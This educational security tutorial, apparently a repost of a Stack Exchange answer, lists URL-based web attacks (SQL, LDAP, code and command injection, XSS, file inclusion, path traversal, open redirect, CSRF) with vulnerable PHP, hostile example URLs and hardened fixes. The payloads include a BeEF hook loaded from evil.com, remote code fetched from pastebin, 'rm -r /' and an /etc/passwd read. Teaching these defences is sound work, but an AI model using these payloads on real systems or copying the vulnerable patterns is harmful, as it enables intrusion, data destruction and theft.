Hacks that work just by changing the URL

  • Each entry shows one legitimate request and one malicious one
  • Some examples require URL encoding to work (the browser usually does this automatically)

SQL Injection

code:
$username = $_GET['username'];
$pw = $_GET['password'];
// user input is pasted straight into the SQL text (mysql_query() is gone since PHP 7, but mysqli_query() with interpolated strings has the same bug)
mysql_query("SELECT * FROM userTable WHERE username = '$username' AND password = '$pw'");
exploit (logs in as administrator without knowing the password; the quote closes the string literal and "or 1=1" makes the WHERE clause true for every row):
example.com/?username=Administrator&password=legalPasswordThatShouldBePostInsteadOfGet
example.com/?username=Administrator&password=password' or 1=1--
Note that MySQL only treats -- as a comment when it is followed by whitespace, so in a URL the payload needs a trailing %20 or +, or # can be used in its place.
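
The same login rebuilt with a prepared statement, as an added example that is not code from the original post. It assumes a PDO connection in $pdo and that userTable.password holds a password_hash() value rather than plaintext:

```php
<?php
// Added example, not code from the original post. Assumes a PDO connection
// in $pdo and that userTable.password holds a password_hash() value.

// The vulnerable form, for comparison. The value is pasted into the SQL
// text, so a quote inside $pw ends the string literal early:
//   ... AND password = 'password' or 1=1-- '
function buildVulnerableQuery(string $username, string $pw): string
{
    return "SELECT * FROM userTable WHERE username = '$username' AND password = '$pw'";
}

function login(PDO $pdo, string $username, string $pw): ?array
{
    // The placeholder fixes the query structure before any value is bound;
    // a quote in $username is just a character inside a string.
    $stmt = $pdo->prepare('SELECT * FROM userTable WHERE username = :username');
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The password is never part of the query at all: fetch the hash by
    // username and let password_verify() do the comparison.
    if ($row === false || !password_verify($pw, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

// Credentials belong in the POST body, not the query string, so they stay
// out of server logs, proxy logs and browser history.
$user = login($pdo, $_POST['username'] ?? '', $_POST['password'] ?? '');
if ($user === null) {
    http_response_code(401);
    exit('Login failed');
}
```

With this version the payload `password' or 1=1--` is compared, quote and all, against the stored hash and simply fails.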

Cross Site Scripting (XSS)

If you are curious about XSS, see my article ‘Guide in understanding XSS – XSS payloads, attack vectors, BeEF hooking, MiTM with Shank and some history’.

code:
$nickname = $_GET['nickname'];
echo "Your nickname is $nickname\n";   // reflected into the page without any encoding
exploit (registers the visiting user's browser as a zombie in BeEF):
example.com/?nickname=Karrax
example.com/?nickname=<script src="http://evil.com/beefmagic.js.php"></script>
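
The nickname echo with output encoding, as an added example that is not code from the original post. It assumes the page is served as UTF-8 HTML:

```php
<?php
// Added example, not code from the original post. Assumes UTF-8 HTML output.
header('Content-Type: text/html; charset=UTF-8');

function e(string $value): string
{
    // Encodes & < > " and ' for an HTML body or attribute context.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty
    // string, which would otherwise silently drop the whole value.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderNickname(string $nickname): string
{
    // The payload from the post arrives as literal text: < and > are
    // encoded, so the browser never creates a <script> element.
    return 'Your nickname is ' . e($nickname) . "\n";
}

echo renderNickname($_GET['nickname'] ?? '');
```

Encoding is context-specific: htmlspecialchars() is right for HTML text and attributes, but a value placed inside a JavaScript string or a URL needs json_encode() or rawurlencode() respectively. A Content-Security-Policy that forbids inline scripts and scripts from untrusted hosts limits the damage when an encoding step is missed.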

Remote code execution (remote file inclusion)

code:
include($_GET["module"].".php");   // with allow_url_include=On, include() will fetch a URL
exploit (fetches and runs arbitrary code from another host; requires allow_url_include=On, which has been off by default since PHP 5.2, and the appended .php can be turned into a harmless query string by ending the URL with ?):
example.com/?module=frontpage
example.com/?module=http://pastebin.com/mymaliciousscript

Command injection

code:
echo shell_exec('cat '.$_GET['filename']);   // the parameter becomes part of a /bin/sh command line
exploit (tries to delete every file the web server user is allowed to delete, starting at /):
example.com/?filename=readme.txt
example.com/?filename=readme.txt;rm -r /
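
The `cat` call done safely, as an added example that is not code from the original post. It assumes the files a visitor may read live in a directory named docs/ (DOC_DIR is an assumed name):

```php
<?php
// Added example, not code from the original post. DOC_DIR is an assumption.
const DOC_DIR = __DIR__ . '/docs';

// Preferred: no shell at all. PHP can read the file itself.
function readDocument(string $filename): ?string
{
    // basename() strips every directory component, ../ included, so the
    // request can only name a file directly inside DOC_DIR.
    $path = DOC_DIR . '/' . basename($filename);
    return is_file($path) ? file_get_contents($path) : null;
}

// If a shell command is genuinely needed, quote every argument.
function catDocument(string $filename): string
{
    $path = DOC_DIR . '/' . basename($filename);
    // escapeshellarg() wraps the value in single quotes and escapes embedded
    // quotes, so ; | && ` and $() reach cat as part of one filename rather
    // than being parsed by /bin/sh. The "--" stops a name such as "-v"
    // from being read as an option.
    return (string) shell_exec('cat -- ' . escapeshellarg($path));
}

// With filename=readme.txt;rm -r / the whole parameter, semicolon and all,
// is passed as one quoted argument, and cat just reports a missing file.
echo readDocument($_GET['filename'] ?? '') ?? 'No such document';
```

The first function is the one to use: a process that never spawns a shell has no shell metacharacters to worry about.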

Code injection

code:
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = $x;");   // $x is pasted unescaped into the code string that eval() runs
exploit (injects a phpinfo() call, which prints very useful attack information on screen):
example.com/?arg=1
example.com/?arg=1; phpinfo()

LDAP injection

code:
$username = $_GET['username'];
$password = $_GET['password'];
// $ldap is an existing ldap_connect() handle; the base DN is a placeholder
ldap_search($ldap, "dc=example,dc=com", "(&(cn=$username)(password=$password))");
exploit (logs in without knowing the admin password; * is the LDAP wildcard, so the filter matches any admin entry that has a password attribute at all):
example.com/?username=admin&password=adminadmin
example.com/?username=admin&password=*
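
An LDAP login that escapes the filter value and lets the directory check the password, as an added example that is not code from the original post. It assumes an LDAP connection in $ldap, users under ou=people,dc=example,dc=com (an assumed base DN) and PHP 5.6 or later for ldap_escape():

```php
<?php
// Added example, not code from the original post. $ldap and the base DN
// are assumptions.

function ldapLogin($ldap, string $username, string $password): bool
{
    // ldap_bind() with an empty password performs an anonymous bind, which
    // succeeds on many directories, so reject that case before anything else.
    if ($password === '') {
        return false;
    }

    // ldap_escape() with LDAP_ESCAPE_FILTER encodes ( ) * \ and NUL, so a
    // username of "*" or "admin)(|(cn=*" stays a literal string in the filter.
    $filter = sprintf('(cn=%s)', ldap_escape($username, '', LDAP_ESCAPE_FILTER));
    $search = ldap_search($ldap, 'ou=people,dc=example,dc=com', $filter, ['cn']);
    if ($search === false) {
        return false;
    }
    $entries = ldap_get_entries($ldap, $search);
    if ($entries['count'] !== 1) {
        return false;
    }

    // The directory verifies the password: a bind as the user's own DN
    // either succeeds or fails, and no filter ever compares the password
    // attribute, so there is nothing for a wildcard to match.
    return @ldap_bind($ldap, $entries[0]['dn'], $password);
}

if (!ldapLogin($ldap, $_POST['username'] ?? '', $_POST['password'] ?? '')) {
    http_response_code(401);
    exit('Login failed');
}
```

The same escaping applies to any value that ends up in a distinguished name, using LDAP_ESCAPE_DN instead.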

Path traversal

code:
include("./" . $_GET['page']);   // include() prints a file that contains no PHP tags verbatim
exploit (fetches /etc/passwd):
example.com/?page=front.php
example.com/?page=../../../../../../../../etc/passwd
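
A safe way to pick the file to include, serving both the include($_GET["module"]) case under "Remote code execution" and the include("./" . $_GET['page']) case above. This is an added example, not code from the original post; it assumes the pages live in a directory named pages/ (PAGE_DIR and PAGE_MAP are assumed names):

```php
<?php
// Added example, not code from the original post. PAGE_DIR and PAGE_MAP
// are assumptions about how the site stores its pages.
const PAGE_DIR = __DIR__ . '/pages';

// Strictest option: map the parameter to a fixed set of files. Anything not
// in the map is rejected, so neither a URL nor a ../ sequence reaches include().
const PAGE_MAP = [
    'frontpage' => 'frontpage.php',
    'front'     => 'front.php',
    'faq'       => 'faq.php',
];

function resolveAllowlisted(string $module): ?string
{
    if (!array_key_exists($module, PAGE_MAP)) {
        return null;
    }
    return PAGE_DIR . '/' . PAGE_MAP[$module];
}

// If the set of pages is not fixed, canonicalise the path and confine it.
function resolveConfined(string $page): ?string
{
    // realpath() resolves ../ and symlinks and returns false for a file that
    // does not exist, so a path that escapes PAGE_DIR is visible here.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $page);
    if ($base === false || $path === false) {
        return null;
    }
    // Compare with the trailing separator so pages_old/ is not accepted as pages/.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$target = resolveAllowlisted($_GET['module'] ?? 'frontpage');
if ($target === null) {
    http_response_code(404);
    exit('No such page');
}
include $target;
```

Keep allow_url_include=Off as well: the allowlist makes it irrelevant, but the setting costs nothing and covers the next include() someone writes.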

Redirect/Forward attack (open redirect)

code:
$redirectUrl = $_GET['url'];
header("Location: $redirectUrl");   // any URL the visitor supplies is sent back as the redirect target
exploit (sends the user from your page to the evil page, with your domain lending the link credibility):
example.com/?url=http://example.com/faq.php
example.com/?url=http://evil.com/sploitCode.php
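
A redirect that only accepts targets on the site's own host, as an added example that is not code from the original post. It assumes the site's host name is known from configuration (OWN_HOST, an assumed name) rather than read from the Host header, and that legitimate targets are site-relative paths such as /faq.php:

```php
<?php
// Added example, not code from the original post. OWN_HOST is an assumption.
const OWN_HOST = 'example.com';

function safeRedirectTarget(string $url, string $fallback = '/'): string
{
    $parts = parse_url($url);
    if ($parts === false) {
        return $fallback;
    }
    // Reject any scheme other than http(s); this also blocks javascript: and data:.
    if (isset($parts['scheme'])
        && !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return $fallback;
    }
    // An absolute URL, or a scheme-relative //evil.com/..., must name our own host.
    if (isset($parts['host']) && strcasecmp($parts['host'], OWN_HOST) !== 0) {
        return $fallback;
    }
    // Rebuild the target from path and query only, so no user-controlled
    // scheme, userinfo, host or port reaches the Location header.
    $path = $parts['path'] ?? '/';
    if ($path === '' || $path[0] !== '/') {
        $path = '/' . $path;
    }
    // Browsers treat "//x" and "/\x" as protocol-relative; refuse both.
    if (strlen($path) > 1 && ($path[1] === '/' || $path[1] === '\\')) {
        return $fallback;
    }
    return $path . (isset($parts['query']) ? '?' . $parts['query'] : '');
}

header('Location: ' . safeRedirectTarget($_GET['url'] ?? '/'));
exit;
```

The reason to rebuild rather than merely inspect is that URL parsing differs between PHP and browsers; emitting only a path you constructed yourself sidesteps those differences.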

Failure to Restrict URL Access

code:

N/A. No .htaccess ACL or equivalent server-side access control. Lets a user guess, or discover by other
means, the location of content that should only be reachable while logged in (or only by an administrator).

exploit:
example.com/users/showUser.php
example.com/admins/editUser.php
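
One way to make the check structural rather than per-file, as an added example that is not code from the original post: a single entry point maps each URL to a script and the role it requires. It assumes the web server rewrites every request to this file, that the scripts under app/ are not reachable directly, and that login stores the user's role in the session (ROUTES is an assumed name):

```php
<?php
// Added example, not code from the original post. Assumes all requests are
// rewritten to this file and that login stores the role in $_SESSION['user'].
session_start();

const ROUTES = [
    '/users/showUser.php'  => ['file' => 'users/showUser.php',  'role' => 'user'],
    '/admins/editUser.php' => ['file' => 'admins/editUser.php', 'role' => 'admin'],
];

function roleAllows(?string $have, string $need): bool
{
    // admin implies user; anything else must match exactly.
    // No session or no role means the default answer is no.
    return $have === $need || ($have === 'admin' && $need === 'user');
}

$path = parse_url($_SERVER['REQUEST_URI'] ?? '/', PHP_URL_PATH) ?: '/';
if (!isset(ROUTES[$path])) {
    // A URL that is not in the table does not exist, however well it is guessed.
    http_response_code(404);
    exit('Not found');
}
if (!roleAllows($_SESSION['user']['role'] ?? null, ROUTES[$path]['role'])) {
    http_response_code(403);
    exit('Forbidden');
}
require __DIR__ . '/app/' . ROUTES[$path]['file'];
```

The point is deny by default: a page that has not been listed with a role cannot be served at all, so forgetting a check on one file is no longer possible.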

Cross-Site Request Forgery

code:

N/A. The application has no secret, tied to the user's session, that each state-changing request must carry to prove it was issued from the site's own pages. Implement such a token: generate it server-side, embed it in every form, and validate it on every request that changes state. The victim's browser attaches the session cookie to the forged request automatically, so being logged in is all the attack needs.

exploit:
Legal submit: example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
On evil page: <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=evilAccount#" width="0" height="0">
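
A per-session token that the transfer form carries and transferFunds checks, as an added example that is not code from the original post. It assumes PHP 7 or later for random_bytes() and that sessions are already in use:

```php
<?php
// Added example, not code from the original post. Assumes PHP 7+ and sessions.
session_start();

function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        // 32 bytes from the CSPRNG, hex-encoded so it is safe in an attribute.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrfField(): string
{
    // Hidden input to place in every state-changing form.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

function verifyCsrfToken(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    // Constant-time comparison; a plain === would leak, byte by byte,
    // how much of the token a guess got right.
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// transferFunds: state changes go over POST, and the token is mandatory.
// A form on evil.com can still POST here, but it cannot read this
// session's token, so the check fails and nothing is transferred.
if ($_SERVER['REQUEST_METHOD'] !== 'POST'
    || !verifyCsrfToken($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Invalid request');
}
// ... perform the transfer with $_POST['amount'] and $_POST['destinationAccount'] ...
```

Setting the session cookie with SameSite=Lax or Strict is a useful second layer, but the token is what works in every browser and for every request type.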

Buffer overflow (triggered by requesting a URL, but in practice delivered with Metasploit)

code:

N/A. Vulnerability in the web server code itself: a standard buffer overflow.

Exploit:

http://www.exploit-db.com/exploits/16798/

 

This was my answer to a question at security.stackexchange.com and is currently the highest voted answer in the community and the first to go over 100 votes. The post can be found here.